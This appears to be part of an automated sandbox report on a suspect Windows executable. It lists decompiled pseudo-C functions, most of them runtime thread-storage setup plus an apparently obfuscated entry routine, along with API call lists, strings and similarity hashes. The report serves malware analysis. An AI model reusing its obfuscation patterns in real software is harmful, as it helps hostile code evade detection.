					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x436648);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E0040D0AC();
							 *0x436644 = E0040F850( *0x436644);
							 *0x436648 = E0040F850( *0x436648);
							 *0x43664c = E0040F850( *0x43664c);
							 *0x436650 = E0040F850( *0x436650);
							_t18 = E0040D2C9();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E0040F952();
								goto L15;
							} else {
								_push(E0040FADE);
								_t21 =  *((intOrPtr*)(E0040F8BC( *0x436644)))();
								__eflags = _t21 - 0xffffffff;
								 *0x42c490 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E004110D9(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x42c490);
										__eflags =  *((intOrPtr*)(E0040F8BC( *0x43664c)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42); // executed
											E0040F98F(_t30, _t37, _t42, __eflags); // executed
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E0040F952();
					return 0;
				}
			}

0x0040fbff
0x0040fc05
0x0040fc0b
0x0040fc0f
0x0040fc27
0x0040fc2f
0x0040fc34
0x0040fc3c
0x0040fc41
0x0040fc49
0x0040fc4e
0x0040fc50
0x0040fc57
0x0040fc5d
0x0040fc62
0x0040fc7a
0x0040fc7f
0x0040fc89
0x0040fc93
0x0040fc99
0x0040fc64
0x0040fc64
0x0040fc6b
0x00000000
0x0040fc6d
0x0040fc6d
0x0040fc74
0x00000000
0x0040fc76
0x0040fc76
0x0040fc78
0x00000000
0x00000000
0x0040fc78
0x0040fc74
0x0040fc6b
0x0040fc9e
0x0040fca4
0x0040fca7
0x0040fcac
0x0040fd7e
0x0040fd7e
0x0040fd7e
0x0040fcb2
0x0040fcb9
0x0040fcbb
0x0040fcbd
0x00000000
0x0040fcc3
0x0040fcc3
0x0040fcd9
0x0040fce9
0x0040fcf9
0x0040fd06
0x0040fd0b
0x0040fd10
0x0040fd12
0x0040fd79
0x0040fd79
0x00000000
0x0040fd14
0x0040fd14
0x0040fd25
0x0040fd27
0x0040fd2a
0x0040fd2f
0x00000000
0x0040fd31
0x0040fd3d
0x0040fd3f
0x0040fd43
0x00000000
0x0040fd45
0x0040fd45
0x0040fd46
0x0040fd5a
0x0040fd5c
0x00000000
0x0040fd5e
0x0040fd5e
0x0040fd60
0x0040fd61
0x0040fd68
0x0040fd6e
0x0040fd72
0x0040fd76
0x0040fd76
0x0040fd5c
0x0040fd43
0x0040fd2f
0x0040fd12
0x0040fcbd
0x0040fd82
0x0040fc11
0x0040fc11
0x0040fc19
0x0040fc19

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0040C91A), ref: 0040FC05
GetProcAddress.KERNEL32(00000000,FlsAlloc,?), ref: 0040FC27
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0040FC34
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0040FC41
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0040FC4E
TlsAlloc.KERNEL32 ref: 0040FC9E
TlsSetValue.KERNEL32(00000000), ref: 0040FCB9

Part of subcall function 0040F850: TlsGetValue.KERNEL32(00000000,0040F8BA,00000000,00412290,00000000,00000000,00000314,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F85D
Part of subcall function 0040F850: TlsGetValue.KERNEL32(00000004,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F874
Part of subcall function 0040F850: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F889
Part of subcall function 0040F850: GetProcAddress.KERNEL32(00000000,EncodePointer,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F899
Part of subcall function 0040F850: RtlEncodePointer.NTDLL(?,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F8A7

GetCurrentThreadId.KERNEL32 ref: 0040FD68

Part of subcall function 0040F952: TlsFree.KERNEL32(0000001A,0040FD7E), ref: 0040F97D

Part of subcall function 0040F8BC: TlsGetValue.KERNEL32(00000000,0040F943), ref: 0040F8C9
Part of subcall function 0040F8BC: TlsGetValue.KERNEL32(00000004), ref: 0040F8E0
Part of subcall function 0040F8BC: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 0040F8F5
Part of subcall function 0040F8BC: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040F905
Part of subcall function 0040F8BC: RtlDecodePointer.NTDLL(?), ref: 0040F913

Part of subcall function 004110D9: Sleep.KERNEL32(00000000,0040FA78,00000001,00000214), ref: 004110FE

Part of subcall function 0040F98F: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00418CB8,0000000C,0040FAA1,00000000,00000000), ref: 0040F9A0
Part of subcall function 0040F98F: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040F9C9
Part of subcall function 0040F98F: GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040F9D9
Part of subcall function 0040F98F: InterlockedIncrement.KERNEL32(0042C4A8), ref: 0040F9FB

Strings

FlsGetValue, xrefs: 0040FC29
FlsSetValue, xrefs: 0040FC36
KERNEL32.DLL, xrefs: 0040FC00
FlsFree, xrefs: 0040FC43
FlsAlloc, xrefs: 0040FC21

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: AddressProc$Value$HandleModule$Pointer$AllocCurrentDecodeEncodeFreeIncrementInterlockedSleepThread
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 2292312579-3819984048
Opcode ID: 585ddeddb7b52054c9609b37b0de9c137685ef3b7ec3faa75b0f07d8c7479e08
Instruction ID: f4645d5930c4b6cfba22fa347c7c0f035c91bb1ae7631caf77b4e8b584b8dd61
Opcode Fuzzy Hash: 585ddeddb7b52054c9609b37b0de9c137685ef3b7ec3faa75b0f07d8c7479e08
Instruction Fuzzy Hash: 06319172900702BAD731BF75AC07A563FA1AB05794B22953FE804A26F0EB38D4488F5C

Function 0040F98F, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 46
libraryloader

C-Code - Quality: 87%

			E0040F98F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t20;
				intOrPtr _t24;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t30;
				intOrPtr _t38;
				void* _t39;

				_t31 = __ebx;
				_push(0xc);
				_push(0x418cb8);
				E0040D48C(__ebx, __edi, __esi);
				_t20 = GetModuleHandleA("KERNEL32.DLL"); // executed
				 *(_t39 - 0x1c) = _t20;
				_t38 =  *((intOrPtr*)(_t39 + 8));
				 *((intOrPtr*)(_t38 + 0x5c)) = 0x42c3e0;
				 *((intOrPtr*)(_t38 + 0x14)) = 1;
				if(_t20 != 0) {
					_t31 = GetProcAddress; // executed
					_t29 = GetProcAddress(_t20, "EncodePointer"); // executed
					 *(_t38 + 0x1f8) = _t29;
					_t30 = GetProcAddress( *(_t39 - 0x1c), "DecodePointer"); // executed
					 *(_t38 + 0x1fc) = _t30;
				}
				 *((intOrPtr*)(_t38 + 0x70)) = 1;
				 *((char*)(_t38 + 0xc8)) = 0x43;
				 *((char*)(_t38 + 0x14b)) = 0x43;
				 *(_t38 + 0x68) = 0x42c4a8;
				InterlockedIncrement(0x42c4a8);
				E0040D43F(_t31, 1, 0xc);
				 *(_t39 - 4) =  *(_t39 - 4) & 0x00000000;
				_t24 =  *((intOrPtr*)(_t39 + 0xc));
				 *((intOrPtr*)(_t38 + 0x6c)) = _t24;
				if(_t24 == 0) {
					_t28 =  *0x42cab0; // 0x42c9d8
					 *((intOrPtr*)(_t38 + 0x6c)) = _t28;
				}
				_push( *((intOrPtr*)(_t38 + 0x6c)));
				E00410678();
				 *(_t39 - 4) = 0xfffffffe;
				return E0040D4D1(E0040FA3A());
			}

0x0040f98f
0x0040f98f
0x0040f991
0x0040f996
0x0040f9a0
0x0040f9a6
0x0040f9a9
0x0040f9ac
0x0040f9b6
0x0040f9bb
0x0040f9c3
0x0040f9c9
0x0040f9cb
0x0040f9d9
0x0040f9db
0x0040f9db
0x0040f9e1
0x0040f9e4
0x0040f9eb
0x0040f9f7
0x0040f9fb
0x0040fa03
0x0040fa09
0x0040fa0d
0x0040fa10
0x0040fa15
0x0040fa17
0x0040fa1c
0x0040fa1c
0x0040fa1f
0x0040fa22
0x0040fa28
0x0040fa39

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,00418CB8,0000000C,0040FAA1,00000000,00000000), ref: 0040F9A0
GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040F9C9
GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040F9D9
InterlockedIncrement.KERNEL32(0042C4A8), ref: 0040F9FB

Part of subcall function 0040D43F: EnterCriticalSection.KERNEL32(?,?,?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 0040D467

Part of subcall function 00410678: InterlockedIncrement.KERNEL32(?), ref: 00410687
Part of subcall function 00410678: InterlockedIncrement.KERNEL32(?), ref: 00410694
Part of subcall function 00410678: InterlockedIncrement.KERNEL32(?), ref: 004106A1
Part of subcall function 00410678: InterlockedIncrement.KERNEL32(?), ref: 004106AE
Part of subcall function 00410678: InterlockedIncrement.KERNEL32(?), ref: 004106BB
Part of subcall function 00410678: InterlockedIncrement.KERNEL32(?), ref: 004106D3
Part of subcall function 00410678: InterlockedIncrement.KERNEL32(00000000), ref: 004106E3
Part of subcall function 00410678: InterlockedIncrement.KERNEL32(?), ref: 004106F7

Strings

DecodePointer, xrefs: 0040F9D1
KERNEL32.DLL, xrefs: 0040F99B
EncodePointer, xrefs: 0040F9BD

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: IncrementInterlocked$AddressProc$CriticalEnterHandleModuleSection
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1110393133-2843748187
Opcode ID: 77a71c01ecdc6170047a1094652cba3ad19394436dc00ed2815630e6f4fa96c2
Instruction ID: fb9e327bc4e86ad3706c899d9e65884dd5987718e2b76837441fe1fa9022f41c
Opcode Fuzzy Hash: 77a71c01ecdc6170047a1094652cba3ad19394436dc00ed2815630e6f4fa96c2
Instruction Fuzzy Hash: CB115E71940705DFD720AF7AD845B9ABBE0AF48304F10853EE599A3691CB78A9448F68

Function 0040F850, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 32
libraryloader

C-Code - Quality: 73%

			E0040F850(intOrPtr _a4) {
				intOrPtr _v0;
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t8;
				intOrPtr _t9;
				intOrPtr _t10;
				void* _t12;

				if(TlsGetValue( *0x42c494) == 0) {
					L4:
					_t6 = GetModuleHandleA("KERNEL32.DLL"); // executed
					if(_t6 == 0) {
						L8:
						return _a4;
					}
					_t8 = GetProcAddress(_t6, "EncodePointer"); // executed
					L6:
					if(_t8 != 0) {
						_t9 =  *_t8(_a4); // executed
						_v0 = _t9;
					}
					goto L8;
				}
				_t10 =  *0x42c490; // 0x4
				if(_t10 == 0xffffffff) {
					goto L4;
				}
				_push(_t10);
				_t12 =  *(TlsGetValue( *0x42c494))();
				if(_t12 == 0) {
					goto L4;
				}
				_t8 =  *(_t12 + 0x1f8);
				goto L6;
			}

0x0040f861
0x0040f884
0x0040f889
0x0040f891
0x0040f8ad
0x0040f8b2
0x0040f8b2
0x0040f899
0x0040f89f
0x0040f8a1
0x0040f8a7
0x0040f8a9
0x0040f8a9
0x00000000
0x0040f8a1
0x0040f863
0x0040f86b
0x00000000
0x00000000
0x0040f86d
0x0040f876
0x0040f87a
0x00000000
0x00000000
0x0040f87c
0x00000000

APIs

TlsGetValue.KERNEL32(00000000,0040F8BA,00000000,00412290,00000000,00000000,00000314,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F85D
TlsGetValue.KERNEL32(00000004,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F874
GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F889
GetProcAddress.KERNEL32(00000000,EncodePointer,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F899
RtlEncodePointer.NTDLL(?,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F8A7

Strings

KERNEL32.DLL, xrefs: 0040F884
EncodePointer, xrefs: 0040F893

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Value$AddressEncodeHandleModulePointerProc
String ID: EncodePointer$KERNEL32.DLL
API String ID: 3030820695-3682587211
Opcode ID: e1a1faa33349261d61b007e91c188944f8f97be2cb1367989c561306ed197f4b
Instruction ID: 213b198e5dd7e5a30d12bdbf8ad6a886c508e8041afcaa9b888406e698b6a230
Opcode Fuzzy Hash: e1a1faa33349261d61b007e91c188944f8f97be2cb1367989c561306ed197f4b
Instruction Fuzzy Hash: BDF054326042129EDA24FB35DC44EEB3EA4AF083947558476B818E2AF1DB38CC46CA5C

Function 0040F8BC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 32
libraryloader

C-Code - Quality: 73%

			E0040F8BC(intOrPtr _a4) {
				intOrPtr _v0;
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t8;
				intOrPtr _t9;
				intOrPtr _t10;
				void* _t12;

				if(TlsGetValue( *0x42c494) == 0) {
					L4:
					_t6 = GetModuleHandleA("KERNEL32.DLL"); // executed
					if(_t6 == 0) {
						L8:
						return _a4;
					}
					_t8 = GetProcAddress(_t6, "DecodePointer"); // executed
					L6:
					if(_t8 != 0) {
						_t9 =  *_t8(_a4); // executed
						_v0 = _t9;
					}
					goto L8;
				}
				_t10 =  *0x42c490; // 0x4
				if(_t10 == 0xffffffff) {
					goto L4;
				}
				_push(_t10);
				_t12 =  *(TlsGetValue( *0x42c494))();
				if(_t12 == 0) {
					goto L4;
				}
				_t8 =  *(_t12 + 0x1fc);
				goto L6;
			}

0x0040f8cd
0x0040f8f0
0x0040f8f5
0x0040f8fd
0x0040f919
0x0040f91e
0x0040f91e
0x0040f905
0x0040f90b
0x0040f90d
0x0040f913
0x0040f915
0x0040f915
0x00000000
0x0040f90d
0x0040f8cf
0x0040f8d7
0x00000000
0x00000000
0x0040f8d9
0x0040f8e2
0x0040f8e6
0x00000000
0x00000000
0x0040f8e8
0x00000000

APIs

TlsGetValue.KERNEL32(00000000,0040F943), ref: 0040F8C9
TlsGetValue.KERNEL32(00000004), ref: 0040F8E0
GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 0040F8F5
GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040F905
RtlDecodePointer.NTDLL(?), ref: 0040F913

Strings

DecodePointer, xrefs: 0040F8FF
KERNEL32.DLL, xrefs: 0040F8F0

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Value$AddressDecodeHandleModulePointerProc
String ID: DecodePointer$KERNEL32.DLL
API String ID: 3637547452-629428536
Opcode ID: 9749bbe704b7cb80d8c031ef03dc7bf9db3eea0e1109e80d9884c7ba75715e9f
Instruction ID: b9744975f3327fb948e758a7dae8ca83f05080644b539119d46011b4a90124de
Opcode Fuzzy Hash: 9749bbe704b7cb80d8c031ef03dc7bf9db3eea0e1109e80d9884c7ba75715e9f
Instruction Fuzzy Hash: 81F05430604312AED730AB35EC54BAB3EA4AF443507148436B408E26F2CB38DC499A9C

Function 002D1D31, Relevance: 10.6, APIs: 7, Instructions: 140
memorytime

Control-flow Graph

Executed
Not Executed

APIs

CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 002D1D52
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 002D1DA7

Part of subcall function 002D1BB5: RtlAllocateHeap.NTDLL(00000000,00000800,002DA05C), ref: 002D1BCA
Part of subcall function 002D1BB5: HeapFree.KERNEL32(00000000,?,002DB2D0), ref: 002D1C21

Part of subcall function 002D196E: GetCurrentProcessId.KERNEL32(?,00000058,?,?,?,?,002DC65A,00000000,?,002DA05C,00000000,00000000), ref: 002D1A6F
Part of subcall function 002D196E: OpenFileMappingW.KERNEL32(00000004,00000000,?), ref: 002D1A92
Part of subcall function 002D196E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 002D1AA6
Part of subcall function 002D196E: CloseHandle.KERNEL32(00000000), ref: 002D1AB3
Part of subcall function 002D196E: lstrlenW.KERNEL32(00000000), ref: 002D1ABE
Part of subcall function 002D196E: CreateEventA.KERNEL32(002DB25C,00000001,00000000,00000000,002DC767,00000001), ref: 002D1B38
Part of subcall function 002D196E: WaitForSingleObject.KERNEL32(?,00007530), ref: 002D1B79
Part of subcall function 002D196E: CloseHandle.KERNEL32(?), ref: 002D1BA7

HeapFree.KERNEL32(00000000,?), ref: 002D1E22
CloseHandle.KERNEL32(?), ref: 002D1E32

Part of subcall function 002D482D: RtlEnterCriticalSection.NTDLL(002DB29C), ref: 002D4836
Part of subcall function 002D482D: Sleep.KERNEL32(0000000A,?,002D1DF2,00000002,?,?), ref: 002D4840
Part of subcall function 002D482D: RtlLeaveCriticalSection.NTDLL(002DB29C), ref: 002D4873

_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 002D1E7E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 002D1EA4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,002D1FF0,00000058,00000000), ref: 002D1EB9

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: CloseHandleHeapWait$CreateCriticalFileFreeMultipleObjectsSection$AllocateCurrentEnterErrorEventLastLeaveMappingObjectOpenProcessSingleSleepTimerViewWaitable_allmullstrlen
String ID:
API String ID: 875881855-0
Opcode ID: ff24044520523e09cc845c5a91fd258499036c2ec552809de9fa06cd34f74af6
Instruction ID: a69fa4014c90cbb52908619821fd559f7684f9883e03a509923c2ada6329a22d
Opcode Fuzzy Hash: ff24044520523e09cc845c5a91fd258499036c2ec552809de9fa06cd34f74af6
Instruction Fuzzy Hash: D54196B2819215BFD7109F58DC88D6BB7EDFB48364F100B2FF994E22A0D7708D608A52

Function 002D3B0F, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 104
memorystring

Control-flow Graph

Executed
Not Executed

APIs

lstrcpyn.KERNEL32(00000000,002DA284,00000008,00000000), ref: 002D3B34
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 002D3BAC
memcpy.NTDLL(?,00000000,?,?,?,00000001), ref: 002D3BF5
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00000001), ref: 002D3C0E

Strings

pnls, xrefs: 002D3BE2
Sep 26 2018, xrefs: 002D3B8B
pnls, xrefs: 002D3BE7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Virtual$AllocFreelstrcpynmemcpy
String ID: Sep 26 2018$pnls$pnls
API String ID: 2133416149-2631464443
Opcode ID: c68acc2944b33382f10104c00f91e0c4145db4eb7cb7313648c2f2e519116f82
Instruction ID: 5872e7781d825b0f0ce654a3e54c4805bacabf15444190a6e21c2d3356467cb9
Opcode Fuzzy Hash: c68acc2944b33382f10104c00f91e0c4145db4eb7cb7313648c2f2e519116f82
Instruction Fuzzy Hash: 4031C572A20205EBCB04DF94C985BAE77B1BF44704F14805BE9006F386C7B0EE54DB92

Function 00401120, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 177

C-Code - Quality: 100%

			E00401120() {
				signed char _v5;
				intOrPtr _v12;
				char _v14;
				signed int _v20;
				short _v24;
				short _v28;
				short _v36;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed short _v68;
				signed int _v76;
				signed int _v80;
				signed int _v81;
				signed short _v88;
				signed short _v96;
				signed char _v97;
				signed short _v108;
				signed short _v112;
				char _v113;
				intOrPtr _v124;
				signed int _v126;
				signed int _v132;
				signed short _v136;
				signed int _v137;
				signed char _v145;
				signed short _v152;
				signed int _v156;
				short _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				signed int _v176;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v189;
				intOrPtr _v196;
				intOrPtr _v204;
				short _v208;
				intOrPtr _v212;
				signed int _v216;
				signed int _v224;
				intOrPtr _v228;
				signed char _v229;
				intOrPtr _t122;
				intOrPtr _t125;
				intOrPtr _t155;
				intOrPtr _t165;
				intOrPtr _t170;
				signed int _t187;

				_v112 = 0xa;
				_v145 = 0x21;
				_v88 = 0x1d;
				_v189 = 0x13;
				_v212 = 0x11;
				_v36 = 0x2d;
				_v28 = 0x26;
				_t122 =  *0x436054; // 0xffffd263
				_t165 =  *0x42c00c; // 0xffffd2e0
				_v36 = _t122 -  *0x42d02c ^ _t165 +  *0x436054;
				 *0x43605c = 0;
				_t125 =  *0x42d024; // 0x18f01f
				_v160 = (_v81 & 0x000000ff) - _v124 + _t125 - 0x4f;
				_v113 = (_v126 & 0x000000ff) + _v196 + 0x00000019 & 0x0000009a;
				_v80 = 0x79;
				_t170 =  *0x42c014; // 0x536cedcb
				_v24 = _v156 - (_v137 & 0x000000ff) + _t170 - 0x22;
				_v208 = _v81 & 0x000000ff ^ 0xffffffd2;
				_v124 = _v48 - _v80 + 0x1b;
				_v60 = _v224 + 0x26;
				_v20 = (_v145 & 0x000000ff) + _v196 ^ _v5 & 0x000000ff;
				_v52 = 0x4369a88;
				_v56 = _v97 & 0x000000ff ^ _v60 - 0x00000048;
				_v80 = _v168 + _v80;
				_v204 = 0x6761e;
				if(_v12 == 2) {
					_v137 = (_v137 & 0x000000ff) + (_v112 & 0x5c ^ _v80);
					_v137 = _v168 +  *0x436048 - _v184 - 0x3e;
					_v188 = (_v189 & 0x000000ff) - _v60 - 0x61;
				}
				_v126 = 0x42 - _v172 + _v196 - (_v108 & 0x0000ffff) + _v156;
				_v216 = _v164 -  *0x42c000 - 0x55;
				_v14 = _v176 & 0x0000ffff | _v156 | 0x00000041 - _v80 + (_v81 & 0x000000ff);
				if(_v52 >= _v204) {
					_v228 = 0x8b - _v156;
					_v216 = _v56 + 0x00000012 | _v224;
					E004010A0(); // executed
					_v14 = _v64 & 0x0000000a & _v48 - (_v229 & 0x000000ff);
					_v64 = 0x5e - _v184 -  *0x42d030;
					_v28 = _v48 ^ 0x00000062 ^ _v68 & 0x0000ffff;
				} else {
					_v160 = (_v152 & 0x0000ffff) + _v124 ^ _v48 + _v80;
					if(_v80 < 0x1e) {
						_v196 = _v156 + _v76;
						_v216 = (_v137 & 0x000000ff) + _v228 +  *0x42c008;
					}
					_v189 = _v189 & 0x000000ff | _v196 + _v156 + _v124 + 0x00000054 ^ 0x00000045;
					_v172 = _v156 - (_v136 & 0x0000ffff) + (_v132 & 0x0000ffff);
					E00401000();
					_v184 = 0x25 - _v212;
					_v184 = 0x2c - _v80;
					_v76 = _v168 + _v196;
				}
				_v176 = 0x0000004d - (_v88 & 0x0000ffff) &  *0x43604c;
				_t187 =  *0x436048; // 0x0
				_v76 = _t187 & _v60;
				_t155 = _v184;
				_v132 = (_v96 & 0x0000ffff) + _t155 - 0x3f;
				return _t155;
			}

0x00401129
0x0040112f
0x00401136
0x0040113c
0x00401143
0x0040114d
0x00401153
0x00401159
0x00401164
0x00401172
0x00401176
0x00401187
0x00401190
0x004011ab
0x004011ae
0x004011c4
0x004011ce
0x004011d9
0x004011e9
0x004011f5
0x0040120b
0x0040120e
0x00401221
0x0040122d
0x00401230
0x0040123e
0x00401253
0x0040126e
0x00401281
0x00401281
0x004012a4
0x004012b6
0x004012d9
0x004012e5
0x004013b2
0x004013c4
0x004013ca
0x004013e3
0x004013f7
0x00401406
0x004012eb
0x004012fd
0x00401308
0x00401313
0x0040132c
0x0040132c
0x00401351
0x0040136c
0x00401372
0x00401382
0x00401390
0x004013a2
0x004013a2
0x0040141b
0x00401422
0x0040142b
0x00401432
0x0040143c
0x00401443

APIs

EntryPoint.ZBETCHECKIN_TRACKER_PROPAN ref: 00401372

Strings

&, xrefs: 00401153
-, xrefs: 0040114D
!, xrefs: 0040112F
y, xrefs: 004011AE

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: EntryPoint
String ID: !$&$-$y
API String ID: 3225343992-3790517558
Opcode ID: f9377fc4e39bec81c7915a3e74f9403889ea3dd9e0ad58da6d78107a8ec7424b
Instruction ID: 9fc8b0546067b550273f9ce3cd18f708ea690dcf0da1e1c991df25e2bd460843
Opcode Fuzzy Hash: f9377fc4e39bec81c7915a3e74f9403889ea3dd9e0ad58da6d78107a8ec7424b
Instruction Fuzzy Hash: 38A1E734D04268CFDB28CFA9D990BACBBB1BF49305F0481DAD449A7356D7385A85CF19

Function 00401DA8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
libraryloader

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00401DA8(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t7;
				signed int _t9;
				struct HINSTANCE__* _t10;
				intOrPtr _t14;

				_t7 =  *0x4054c0;
				_v8 = _v8 & 0x00000000;
				_t14 =  *0x405474; // 0x8c
				if(_t7 != 0) {
					L2:
					if(_t14 != 0) {
						_t9 =  *_t7(_t14,  &_v8); // executed
						if(_t9 == 0) {
							_v8 = _v8 & _t9;
						}
					}
					L5:
					return _v8;
				}
				_t10 = GetModuleHandleA("KERNEL32.DLL"); // executed
				 *0x4054c8 = _t10; // executed
				_t7 = GetProcAddress(_t10, "IsWow64Process"); // executed
				 *0x4054c0 = _t7;
				if(_t7 == 0) {
					goto L5;
				}
				goto L2;
			}

0x00401dac
0x00401db1
0x00401db8
0x00401dbe
0x00401de5
0x00401de7
0x00401dee
0x00401df2
0x00401df4
0x00401df4
0x00401df2
0x00401df7
0x00401dfc
0x00401dfc
0x00401dc5
0x00401dd1
0x00401dd6
0x00401dde
0x00401de3
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,0000000C,?,?,00401165,?,00000000), ref: 00401DC5
